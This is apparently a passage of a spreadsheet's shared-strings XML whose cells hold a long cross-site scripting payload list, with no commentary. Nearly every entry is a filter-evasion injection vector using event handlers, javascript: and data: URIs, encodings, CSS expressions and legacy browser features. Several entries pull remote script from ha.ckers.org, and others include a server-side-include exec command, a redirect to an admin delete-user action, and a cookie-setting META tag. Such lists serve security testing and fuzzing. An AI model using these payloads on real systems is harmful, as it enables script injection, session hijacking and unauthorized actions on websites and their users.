    <t>&lt;object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;meta http-equiv="refresh" content="0;javascript&amp;colon;alert(1)"/&gt;</t>
  </si>
  <si>
    <t>&lt;math&gt;&lt;a xlink:href="//jsfiddle.net/t846h/"&gt;click</t>
  </si>
  <si>
    <t>&lt;embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always&gt;</t>
  </si>
  <si>
    <t>&lt;svg contentScriptType=text/vbs&gt;&lt;script&gt;MsgBox+1</t>
  </si>
  <si>
    <t>&lt;a href="data:text/html;base64_,&lt;svg/onload=\u0061&amp;#x6C;&amp;#101%72t(1)&gt;"&gt;X&lt;/a</t>
  </si>
  <si>
    <t>&lt;iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')&lt;/script U+</t>
  </si>
  <si>
    <t>&lt;script/src="data&amp;colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"&gt;&lt;/script a=\u0061 &amp; /=%2F</t>
  </si>
  <si>
    <t>&lt;script/src=data&amp;colon;text/j\u0061v\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script</t>
  </si>
  <si>
    <t>&lt;object data=javascript&amp;colon;\u0061&amp;#x6C;&amp;#101%72t(1)&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;+-+-1-+-+alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#10alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;script itworksinallbrowsers&gt;/*&lt;script* */alert(1)&lt;/script</t>
  </si>
  <si>
    <t>&lt;img src ?itworksonchrome?\/onerror = alert(1)</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;script&gt;//&amp;NewLine;confirm(1);&lt;/script &lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert(1)</t>
  </si>
  <si>
    <t>&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe</t>
  </si>
  <si>
    <t>&lt;script x&gt; alert(1) &lt;/script 1=2</t>
  </si>
  <si>
    <t>&lt;div/onmouseover='alert(1)'&gt; style="x:"&gt;</t>
  </si>
  <si>
    <t>&lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt;</t>
  </si>
  <si>
    <t>&lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)"&gt;x&lt;/button&gt;</t>
  </si>
  <si>
    <t>&gt;&lt;img src=x onerror=window.open('https://www.google.com/');&gt;&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME&lt;math&gt;&lt;a xlink:href=//jsfiddle.net/t846h/"&gt;click</t>
  </si>
  <si>
    <t>&lt;object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;a href="data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203"&gt;Click Me&lt;/a&gt;</t>
  </si>
  <si>
    <t>‘; alert(1);</t>
  </si>
  <si>
    <t>‘)alert(1);//</t>
  </si>
  <si>
    <t>&lt;ScRiPt&gt;alert(1)&lt;/sCriPt&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=jAVasCrIPt:alert(‘XSS’)&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=”javascript:alert(‘XSS’);”&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=javascript:alert(‘XSS’)&gt;</t>
  </si>
  <si>
    <t>&lt;img src=xss onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"&gt;</t>
  </si>
  <si>
    <t>&lt;div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)"&gt;x&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT&gt;String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;IMG “””&gt;&lt;SCRIPT&gt;alert(“XSS”)&lt;/SCRIPT&gt;”&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=”jav ascript:alert(‘XSS’);”&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=”jav&amp;#x09;ascript:alert(‘XSS’);”&gt;</t>
  </si>
  <si>
    <t>&lt;&lt;SCRIPT&gt;alert(“XSS”);//&lt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>%253cscript%253ealert(1)%253c/script%253e</t>
  </si>
  <si>
    <t>“&gt;&lt;s”%2b”cript&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>foo&lt;script&gt;alert(1)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;</t>
  </si>
  <si>
    <t>&lt;BODY BACKGROUND=”javascript:alert(‘XSS’)”&gt;</t>
  </si>
  <si>
    <t>&lt;BODY ONLOAD=alert(‘XSS’)&gt;</t>
  </si>
  <si>
    <t>&lt;INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC=”javascript:alert(‘XSS’)”</t>
  </si>
  <si>
    <t>javascript:alert("hellox worldss")</t>
  </si>
  <si>
    <t>&lt;img src="javascript:alert('XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;img src=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;</t>
  </si>
  <si>
    <t>&lt;"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt;</t>
  </si>
  <si>
    <t>;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;?/SCRIPT&gt;&amp;submit.x=27&amp;submit.y=9&amp;cmd=search</t>
  </si>
  <si>
    <t>&lt;script&gt;alert("hellox worldss")&lt;/script&gt;&amp;safe=high&amp;cx=006665157904466893121:su_tzknyxug&amp;cof=FORID:9#510</t>
  </si>
  <si>
    <t>&lt;script&gt;alert("XSS");&lt;/script&gt;&amp;search=1</t>
  </si>
  <si>
    <t>0&amp;q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83%?2C83))&lt;/SCRIPT&gt;&amp;submit-frmGoogleWeb=Web+Search</t>
  </si>
  <si>
    <t>&lt;h1&gt;&lt;font color=blue&gt;hellox worldss&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;BODY ONLOAD=alert('hellox worldss')&gt;</t>
  </si>
  <si>
    <t>&lt;input onfocus=write(XSS) autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;input onblur=write(XSS) autofocus&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;body onscroll=alert(XSS)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;button formaction="javascript:alert(XSS)"&gt;lol</t>
  </si>
  <si>
    <t>&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=alert(XSS)//"&gt;</t>
  </si>
  <si>
    <t>&lt;![&gt;&lt;img src="]&gt;&lt;img src=x onerror=alert(XSS)//"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=alert(XSS)//"&gt;</t>
  </si>
  <si>
    <t>&lt;? foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;! foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;/ foo="&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;? foo="&gt;&lt;x foo='?&gt;&lt;script&gt;alert(1)&lt;/script&gt;'&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;! foo="[[[Inception]]"&gt;&lt;x foo="]foo&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;% foo&gt;&lt;x foo="%&gt;&lt;script&gt;alert(123)&lt;/script&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;div style="font-family:'foo&amp;#10;;color:red;';"&gt;LOL</t>
  </si>
  <si>
    <t>LOL&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;({0:#0=alert/#0#/#0#(0)})&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;svg xmlns="http://www.w3.org/2000/svg"&gt;LOL&lt;script&gt;alert(123)&lt;/script&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT&amp;gt;alert(/XSS/&amp;#46;source)&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>\\";alert('XSS');//</t>
  </si>
  <si>
    <t>&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\");&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BODY BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG DYNSRC=\"javascript&amp;#058;alert('XSS')\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG LOWSRC=\"javascript&amp;#058;alert('XSS')\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BGSOUND SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BR SIZE=\"&amp;{alert('XSS')}\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;LAYER SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\"&amp;gt;&amp;lt;/LAYER&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;LINK REL=\"stylesheet\" HREF=\"javascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;LINK REL=\"stylesheet\" HREF=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;@import'http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css';&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=\"Link\" Content=\"&amp;lt;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css&amp;gt;; REL=stylesheet\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;BODY{-moz-binding&amp;#58;url(\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xssmoz&amp;#46;xml#xss\")}&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XSS STYLE=\"behavior&amp;#58; url(xss&amp;#46;htc);\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;li {list-style-image&amp;#58; url(\"javascript&amp;#058;alert('XSS')\");}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC='vbscript&amp;#058;msgbox(\"XSS\")'&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"mocha&amp;#58;&amp;#91;code&amp;#93;\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"livescript&amp;#058;&amp;#91;code&amp;#93;\"&amp;gt;</t>
  </si>
  <si>
    <t>žscriptualert(EXSSE)ž/scriptu</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&amp;#058;alert('XSS');\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&amp;#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&amp;#58;//;URL=javascript&amp;#058;alert('XSS');\"</t>
  </si>
  <si>
    <t>&amp;lt;IFRAME SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;&amp;lt;/IFRAME&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;&amp;lt;/FRAMESET&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;TABLE BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;DIV STYLE=\"background-image&amp;#58; url(javascript&amp;#058;alert('XSS'))\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;DIV STYLE=\"background-image&amp;#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&amp;#46;1027\0058&amp;#46;1053\0053\0027\0029'\0029\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;DIV STYLE=\"width&amp;#58; expression(alert('XSS'));\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript&amp;#58;alert(\"XSS\")';&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG STYLE=\"xss&amp;#58;expr/*XSS*/ession(alert('XSS'))\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XSS STYLE=\"xss&amp;#58;expression(alert('XSS'))\"&amp;gt;</t>
  </si>
  <si>
    <t>exp/*&amp;lt;A STYLE='no\xss&amp;#58;noxss(\"*//*\");</t>
  </si>
  <si>
    <t>xss&amp;#58;ex&amp;#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE TYPE=\"text/javascript\"&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE&amp;gt;&amp;#46;XSS{background-image&amp;#58;url(\"javascript&amp;#058;alert('XSS')\");}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;STYLE type=\"text/css\"&amp;gt;BODY{background&amp;#58;url(\"javascript&amp;#058;alert('XSS')\")}&amp;lt;/STYLE&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;!--&amp;#91;if gte IE 4&amp;#93;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;!&amp;#91;endif&amp;#93;--&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;BASE HREF=\"javascript&amp;#058;alert('XSS');//\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\"&amp;gt;&amp;lt;/OBJECT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;OBJECT classid=clsid&amp;#58;ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript&amp;#058;alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;EMBED SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;swf\" AllowScriptAccess=\"always\"&amp;gt;&amp;lt;/EMBED&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;EMBED SRC=\"data&amp;#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&amp;gt;&amp;lt;/EMBED&amp;gt;</t>
  </si>
  <si>
    <t>a=\"get\";</t>
  </si>
  <si>
    <t>b=\"URL(\\"\";</t>
  </si>
  <si>
    <t>c=\"javascript&amp;#058;\";</t>
  </si>
  <si>
    <t>d=\"alert('XSS');\\")\";</t>
  </si>
  <si>
    <t>eval(a+b+c+d);</t>
  </si>
  <si>
    <t>&amp;lt;HTML xmlns&amp;#58;xss&amp;gt;&amp;lt;?import namespace=\"xss\" implementation=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;htc\"&amp;gt;&amp;lt;xss&amp;#58;xss&amp;gt;XSS&amp;lt;/xss&amp;#58;xss&amp;gt;&amp;lt;/HTML&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;&amp;lt;IMG SRC=\"javas&amp;#93;&amp;#93;&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;cript&amp;#58;alert('XSS');\"&amp;gt;&amp;#93;&amp;#93;&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XML ID=\"xss\"&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=\"javas&amp;lt;!-- --&amp;gt;cript&amp;#58;alert('XSS')\"&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&amp;gt;&amp;lt;/SPAN&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;XML SRC=\"xsstest&amp;#46;xml\" ID=I&amp;gt;&amp;lt;/XML&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;?xml&amp;#58;namespace prefix=\"t\" ns=\"urn&amp;#58;schemas-microsoft-com&amp;#58;time\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;?import namespace=\"t\" implementation=\"#default#time2\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;t&amp;#58;set attributeName=\"innerHTML\" to=\"XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;jpg\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;!--#exec cmd=\"/bin/echo '&amp;lt;SCR'\"--&amp;gt;&amp;lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'\"--&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;? echo('&amp;lt;SCR)';</t>
  </si>
  <si>
    <t>echo('IPT&amp;gt;alert(\"XSS\")&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;IMG SRC=\"http&amp;#58;//www&amp;#46;thesiteyouareon&amp;#46;com/somecommand&amp;#46;php?somevariables=maliciouscode\"&amp;gt;</t>
  </si>
  <si>
    <t>Redirect 302 /a&amp;#46;jpg http&amp;#58;//victimsite&amp;#46;com/admin&amp;#46;asp&amp;deleteuser</t>
  </si>
  <si>
    <t>&amp;lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&amp;lt;SCRIPT&amp;gt;alert('XSS')&amp;lt;/SCRIPT&amp;gt;\"&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT a=\"&amp;gt;\" SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT =\"&amp;gt;\" SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT a=\"&amp;gt;\" '' SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT \"a='&amp;gt;'\" SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT a=`&amp;gt;` SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT a=\"&amp;gt;'&amp;gt;\" SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;SCRIPT&amp;gt;document&amp;#46;write(\"&amp;lt;SCRI\");&amp;lt;/SCRIPT&amp;gt;PT SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//66&amp;#46;102&amp;#46;7&amp;#46;147/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//1113982867/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//0x42&amp;#46;0x0000066&amp;#46;0x7&amp;#46;0x93/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//0102&amp;#46;0146&amp;#46;0007&amp;#46;00000223/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"htt p&amp;#58;//6 6&amp;#46;000146&amp;#46;0x7&amp;#46;147/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"//www&amp;#46;google&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"//google\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org@google\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//google&amp;#58;ha&amp;#46;ckers&amp;#46;org\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//google&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//www&amp;#46;google&amp;#46;com&amp;#46;/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"javascript&amp;#058;document&amp;#46;location='http&amp;#58;//www&amp;#46;google&amp;#46;com/'\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;A HREF=\"http&amp;#58;//www&amp;#46;gohttp&amp;#58;//www&amp;#46;google&amp;#46;com/ogle&amp;#46;com/\"&amp;gt;XSS&amp;lt;/A&amp;gt;</t>
  </si>
  <si>
    <t>&amp;lt;</t>
  </si>
  <si>
